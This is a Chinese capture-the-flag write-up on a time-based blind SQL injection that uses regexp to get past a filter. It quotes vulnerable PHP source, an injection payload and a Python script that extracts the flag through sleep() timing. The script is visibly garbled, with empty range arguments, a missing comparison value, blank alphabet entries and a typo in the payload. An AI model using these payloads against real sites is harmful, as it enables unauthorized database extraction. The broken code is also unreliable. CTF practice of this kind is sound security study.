GYCTF 盲注【regexp注入+时间盲注】
2024-09-05 14:30:57
考点:regexp注入+时间盲注
源码:
<?php
# flag在fl4g里
include 'waf.php';
header("Content-type: text/html; charset=utf-8");
$db = new mysql(); $id = $_GET['id']; if ($id) {
if(check_sql($id)){
exit();
} else {
$sql = "select * from flllllllag where id=$id";
$db->query($sql);
}
}
highlight_file(__FILE__);
union select ' = 都ban了,但sleep()没ban
考虑regexp代替 = 的时间盲注
?id=1 or if((length (datanase()) regexp 5, sleep(5),1) exp:
#脚本来源https://www.gem-love.com/ctf/1669.html#i-2
import requests
import time
import datetime
from urllib.parse import quote url = "http://2c2d306b5d6745be846972da7fd262b6e3668d53fa124de3.changame.ichunqiu.com/?id=111"
alphabet = ['?','!',',','|','[',']','{','}','_','/','*','-','+','&',"%",'#','@','$','~','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','','','','','','','','','',''] target = 'fl4g'
result = ''
print('www.gem-love.com')
for i in range (,):
for char in alphabet:
# 设置payload
payload =' or if((substr(({}),{},1) regexp "^{}"),sleep(3),1)'.format(target, i, char)
# 计算响应时长
start = int(time.time())
r = requests.get(url+quote(payload))
response_time = int(time.time()) - start if response_time >= :
result += char
print('Found: {}'.format(result))
break
最新文章
- EBS中启用OAF页面个性化三个配置
- ndk学习19: 使用Eclipse调试so
- Scala 深入浅出实战经典 第78讲:Type与Class实战详解
- 在shell脚本中使用函数
- 通过VMware Tools 将主机windows的目录共享给linux虚拟机
- [刷题codeforces]650A.637A
- zepto源码学习-01-整体感知
- CSS浏览器兼容性----Hack
- 基于XMPP实现的Openfire的配置安装+Android客户端的实现
- Spark link集合
- XPath与多线程爬虫
- mac 命令行读取 u盘
- Visual simultaneous localization and mapping: a survey 论文解析(全)
- Debian8搭建LEMP环境
- Acrobat.CAcroPDDoc open 无法找到指定文件
- [转] 使用slim3快速开发RESTful API
- python: 多态与虚函数;
- MVC开发中的常见错误-06-";无法在发送 HTTP 标头之后进行重定向。";
- cookie implements session
- CentOS6.3 安装配置 ant